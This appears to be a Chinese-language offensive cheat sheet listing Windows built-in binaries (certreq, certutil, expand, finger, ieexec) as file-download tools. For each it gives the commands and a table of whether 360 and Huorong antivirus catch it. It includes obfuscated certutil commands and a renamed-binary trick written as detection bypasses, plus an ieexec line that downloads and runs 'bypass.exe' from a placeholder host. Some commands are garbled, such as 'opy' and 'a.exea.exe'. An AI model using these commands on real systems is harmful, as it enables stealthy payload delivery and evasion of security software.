CertReq.exe
Paths:
C:\Windows\System32\certreq.exe
C:\Windows\SysWOW64\certreq.exe
system:
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
下载文件命令:
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
注意:只支持POST类型的下载请求,c:\windows\win.ini内容为POST的数据请求体,可以随意定义
杀软测试
360 | 火绒 |
---|---|
√ | √ |
Certutil.exe
paths:
C:\Windows\System32\certutil.exe
C:\Windows\SysWOW64\certutil.exe
system:
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
下载命令:
certutil -urlcache -split -f http:xxxx.xxxx.xxxx a.txt
绕过命令:
certutil -ur“”lcache -split -f http://xxxxx.xxx.xxx a.txt
opy c:\windows\system32\certutil.exe a.exe
a.exe
a.exe -urlcache -split -f http://xxxx.xxx.xxx.xxx/a.exea.exe
杀软测试
360 | 火绒 |
---|---|
√ | √ |
Expand.exe
paths:
C:\Windows\System32\Expand.exe
C:\Windows\SysWOW64\Expand.exe
system:
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
下载命令:
expand \\webdav\folder\a.exe c:\ADS\a.exe
缺点:
只支持UNC路径下载,linux需要配置共享
杀软测试
360 | 火绒 |
---|---|
√ | √ |
Finger.exe
Paths:
c:\windows\system32\finger.exe
c:\windows\syswow64\finger.exe
system:
Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
下载命令:
finger kali@192.168.180.190 | more +8 >1.txt
注意:需要再服务端开启finger服务,再kali用户家目录下将下载的文件写入.plan文件中,具体参考https://www.slashroot.in/finger-server-configuration-linux。
杀软测试
360 | 火绒 |
---|---|
√ | √ |
Ieexec.exe
paths:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
system:
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
下载并执行命令:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe http://x.x.x.x:8080/bypass.exe
杀软测试
360 | 火绒 |
---|---|
X | √ |
Q.E.D.